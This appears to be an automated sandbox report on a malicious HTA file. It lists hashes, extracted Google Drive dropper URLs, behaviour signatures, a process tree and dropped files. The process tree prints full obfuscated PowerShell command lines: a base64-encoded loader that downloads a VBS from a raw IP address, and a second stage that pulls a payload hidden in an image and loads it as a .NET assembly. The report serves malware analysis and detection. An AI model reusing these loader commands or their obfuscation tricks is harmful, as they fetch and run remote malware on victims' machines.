Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05-11-2024 07:32

General

  • Target

    bestgreetingwithbestthingsevermadewithgreatthigns.hta

  • Size

    206KB

  • MD5

    64d1fd56bfbbb3698a9550ea63759364

  • SHA1

    dcb935d539fa987f85bdda8bf43ac3d2f368df13

  • SHA256

    706e2d312d3693ccd38e6b489e13e12db863b723865f7f05580bcdc1c779a342

  • SHA512

    906a7a5df0c4891a3a89abc253a494efbb382e2a75f035b3aabc6cdac94f9b09324f370e326b12edd461f21a889d41c041bd44131c334e0b2b395ff813fc1e93

  • SSDEEP

    48:4FhWsTR/F7gNqXfDx4l0i2F4B0i2Nq87ONSK4EkcdQ03+ljAymG987n1adW4yV4u:43F97/OlLBgTK9Q03+ljNAolv2lq/Q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bestgreetingwithbestthingsevermadewithgreatthigns.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\SysWOW64\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE
      "C:\Windows\SYStEM32\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE" "PowErShEll -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe ; iex($(iEX('[SYsTeM.TeXt.EnCoding]'+[chAr]0X3A+[CHAr]0X3A+'uTf8.geTSTring([SYstem.ConVERT]'+[chAR]58+[CHAR]58+'fRoMBASE64string('+[CHar]0X22+'JGVhNmM4bXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlckRlZmluSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OLmRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENmbXIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVV2eVZCUkQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZmWWxEb2wsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb0ZYckloKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3V4dFBJQkp4bCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbklZcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZWE2YzhtclQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuNTIvMzUvcGljdHVyZXdpdGhhdHRpdHVkZWV2ZW5iZXR0ZXJmb3JhbGx0aGluZ3MudElGIiwiJGVOdjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMiLDAsMCk7U1RBUnQtc2xlZVAoMyk7c3RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMi'+[cHar]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2080
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i1y4v0de.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2772
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB626.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB625.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2368
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithattitudeevenbetterforallthin.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdpWEtpbScrJ2FnJysnZVVybCA9IE5RMGh0dHBzOi8vZHJpdmUuZ29vZ2xlJysnLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIE5RMDtpWEt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5Jysnc3RlbS5OZXQuVycrJ2ViQ2xpZW50O2lYSycrJ2ltYWdlQnl0ZXMgPSBpWCcrJ0t3ZWJDbGllbnQuRG93bmxvYWREYXRhKGlYS2ltYWdlVXJsKTtpWEtpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW4nKydjb2RpbmddOjonKydVVEY4LkdldFN0cmluZyhpWEtpbWFnZUJ5dGVzKTtpWEtzdGFydEZsYWcgPSBOUTA8PEJBU0U2NF9TVEFSVD4+TlEwO2lYS2VuZEZsYWcgPSBOUTA8PEJBU0U2NF9FTkQ+Pk5RMDtpWEtzdGFydEluZGV4ID0gaVhLaW1hZ2VUZXh0LkluZGV4T2YoaVhLc3RhcnRGbGFnKTtpWEtlbmRJbmRleCA9IGlYS2ltYWdlVGV4dC5JbmRleE9mKGlYS2VuZEZsYWcpO2lYS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBpWEtlbmQnKydJbmRleCAtZ3QgaVhLc3RhcnRJbmRleDtpWEtzdGFydEluZGV4ICs9IGlYS3N0YXJ0RmxhZycrJy5MZW5ndGg7aVhLYmFzZTY0TGVuZ3RoID0gaVhLZW5kSW5kZXgnKycgLSBpWEtzdGFydEluJysnZGV4O2lYS2Jhc2U2NENvbW1hbmQgPSBpWEtpbWFnZVRleHQuU3Vic3RyaW4nKydnKGlYS3N0JysnYXJ0SW5kZXgsJysnIGlYS2Jhc2U2NExlbmd0aCk7aVhLYmFzZTY0UmV2ZXJzZWQgPSAtam8nKydpbiAoaVhLYmEnKydzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIDJDUSBGb3JFYWNoLU9iamVjdCB7IGlYS18gfSlbLTEuLi0oaVhLYmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtpWEtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvJysnbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKGlYS2Jhc2U2NFJldmVyc2VkKTtpWEtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoaVhLY29tbWFuZEJ5dGVzKTtpWEt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKE5RMFZBSU5RMCk7aVhLdmFpTWV0aG9kLkknKydudm9rZShpWEtudWxsLCBAKE5RMHR4dC5VTExQTVMvNTMvMjUuNy44NjEuNDAxLy86cHR0aE5RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwZGVzYXRpdmFkbycrJ05RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwYXNwbmV0X3JlZ2Jyb3dzZXJzTlEwLCBOUTBkZXNhdGl2YWRvTlEwLCBOUScrJzBkZXNhdGl2YWRvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXRpdmFkb05RMCxOUTBkZXNhdGl2YScrJ2RvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXQnKydpdmFkb05RMCxOUTAxTlEwLE5RMGRlc2F0aXZhZG9OUTApKTsnKS5SRVBsYWNlKCcyQ1EnLCd8JykuUkVQbGFjZSgnaVhLJyxbc1RyaU5nXVtjaGFyXTM2KS5SRVBsYWNlKChbY2hhcl03OCtbY2hhcl04MStbY2hhcl00OCksW3NUcmlOZ11bY2hhcl0zOSkgfCAuICggJHNoRWxMSURbMV0rJHNIZUxsaURbMTNdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2736
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('iXKim'+'ag'+'eUrl = NQ0https://drive.google'+'.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 NQ0;iXKwebClient = New-Object Sy'+'stem.Net.W'+'ebClient;iXK'+'imageBytes = iX'+'KwebClient.DownloadData(iXKimageUrl);iXKimageText = [System.Text.En'+'coding]::'+'UTF8.GetString(iXKimageBytes);iXKstartFlag = NQ0<<BASE64_START>>NQ0;iXKendFlag = NQ0<<BASE64_END>>NQ0;iXKstartIndex = iXKimageText.IndexOf(iXKstartFlag);iXKendIndex = iXKimageText.IndexOf(iXKendFlag);iXKstartIndex -ge 0 -and iXKend'+'Index -gt iXKstartIndex;iXKstartIndex += iXKstartFlag'+'.Length;iXKbase64Length = iXKendIndex'+' - iXKstartIn'+'dex;iXKbase64Command = iXKimageText.Substrin'+'g(iXKst'+'artIndex,'+' iXKbase64Length);iXKbase64Reversed = -jo'+'in (iXKba'+'se64Command.ToCharArray() 2CQ ForEach-Object { iXK_ })[-1..-(iXKbase64Co'+'mmand.Length)];iXKcommandBytes = [System.Co'+'nvert]::FromBase64String(iXKbase64Reversed);iXKloadedAssembly = [System.Reflection.Assembly]::Load(iXKcommandBytes);iXKvaiMethod = [dnlib.IO.Home].GetMethod(NQ0VAINQ0);iXKvaiMethod.I'+'nvoke(iXKnull, @(NQ0txt.ULLPMS/53/25.7.861.401//:ptthNQ0, NQ0desativadoNQ0, NQ0desativado'+'NQ0, NQ0desativadoNQ0, NQ0aspnet_regbrowsersNQ0, NQ0desativadoNQ0, NQ'+'0desativadoNQ0,NQ0desativadoNQ0,NQ0desativadoNQ0,NQ0desativa'+'doNQ0,NQ0desativadoNQ0,NQ0desat'+'ivadoNQ0,NQ01NQ0,NQ0desativadoNQ0));').REPlace('2CQ','|').REPlace('iXK',[sTriNg][char]36).REPlace(([char]78+[char]81+[char]48),[sTriNg][char]39) | . ( $shElLID[1]+$sHeLliD[13]+'X')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2260

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESB626.tmp

    Filesize

    1KB

    MD5

    a1163b669d979411e753e4662427745a

    SHA1

    3a88f7c8405ebbaeed1bc563e396d0807ae6a956

    SHA256

    571d5cc655ec1d6673e01064c3f37bbf16884e6629c6b31c61dc79293f4151db

    SHA512

    9e705b05874d07880f00cf279991ac5e944918a5653a3998021185a5284e78a0c4999a98b85b37d3864eb0200f6e5accf7549b57afa75fa209048b8914ada0fd

  • C:\Users\Admin\AppData\Local\Temp\i1y4v0de.dll

    Filesize

    3KB

    MD5

    b6eb2097cb60320d4a8e9bb31578ec3e

    SHA1

    5f6314e1911cc44e9e85cc4da58f2d282b5c5b2b

    SHA256

    92c5e00b41dcee69bf3144c5930b3e23c08291e4c43ae2f9eea374ea44ac9a23

    SHA512

    9791d50044b36a06a5fd9f3d7f9106c13726eaece371d822f3d82e811bc70a5f35c044031a982e8bfc5adee1331192f5028336b81c21d612f9d9e99c611d1bc8

  • C:\Users\Admin\AppData\Local\Temp\i1y4v0de.pdb

    Filesize

    7KB

    MD5

    026ea8634777287b2e7a212af8a091ba

    SHA1

    120e2d73ce6857a1942450420d88968d70993dc6

    SHA256

    dd564450a3bfb3c358db255490e3950b70ecbc1f19f211be6a784b9f3f3d3a4f

    SHA512

    062ceffb853a2c10380835798032694bfa5dca67498184c11a555a02ac63a25e2e343dc1fa13430b315c5280d7c547a67473f8256db0e9b420142ce58b2976b2

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    9c5845ffd7f95d0f63b1d01400479c1f

    SHA1

    13fcc1e7244f07e36cdc33fe17dcd7105f8f54d5

    SHA256

    1ed678f5a33a043bfe654391eed0335d05d238213d45ddff8f0c3929ac34dc33

    SHA512

    7ea321038aaf2c3eb9c19cc7a0d9cd0e534dd8f0ba376556df40ed0f555fba5ebf0f1806991a0c508927c4d0ed86f5d4166265048b6855915c9825d3d386c99d

  • C:\Users\Admin\AppData\Roaming\picturewithattitudeevenbetterforallthin.vbs

    Filesize

    137KB

    MD5

    8575080d678736f4370fa4b88d00c148

    SHA1

    ec4023c9d47d5d4c93e1f76d6400c6dfbec3a143

    SHA256

    521c52c7c4e3e15c8d9805eeb75b45c85679c7ac9e744d9f53d67a7840cf309f

    SHA512

    3b3e106f9ff3f57a41ca101e179c373e0782a1d5a82a113ee72b993893c4f5ad615d075631904ee3ab417f4b7f10062f15153280b159623ad8b0f71d49073593

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCB625.tmp

    Filesize

    652B

    MD5

    9d2beb82d77a91126da0307d4547c802

    SHA1

    ea90957562a3563161aea17d8cc267cbacdda202

    SHA256

    8a772f3dd27af6a45a2ffcb729fed284c734c54ac1a347651c52281d7ef8e67c

    SHA512

    af61d22af405150b860dddb681f587d0bbead9a610aed752be5dbb54d13d5260a7d811e444365f986a51a393a07b22276bc1eefda1c3799b2ac405286ace11f4

  • \??\c:\Users\Admin\AppData\Local\Temp\i1y4v0de.0.cs

    Filesize

    478B

    MD5

    3da4ad222b76364bbe83d07f6bbf5f06

    SHA1

    6b4be35e25435be0f75e9db059c91e3a230e81d7

    SHA256

    1cf28334727114e790315d7a9bbc1b3512b68694b50dad3b8fcf402ff3a7eee6

    SHA512

    4585510bc72ffd7635f53505edb14082520781df4a9f58be5d090190e76663a9254f1fe2eff5471b5703df98acc58890dc87d6ff2542edc136c96f521c5409fd

  • \??\c:\Users\Admin\AppData\Local\Temp\i1y4v0de.cmdline

    Filesize

    309B

    MD5

    7aecb391edaa2df0fdf249a0dbe90717

    SHA1

    2ea6aa29beb6b5498385f27a75641c583be995dd

    SHA256

    6d4a6a42f04e3164c90c98f7a2e4bae149a45a2b7f22ebab2d5a3dc9c4409e9f

    SHA512

    1145e83cd17095064e63895ca4c60f48fa105ca9ff3ab4bfa97747328ae37ebde5d77426659aefcc664ff998eedc24d9de8a4720110ed287826d35e037b9594d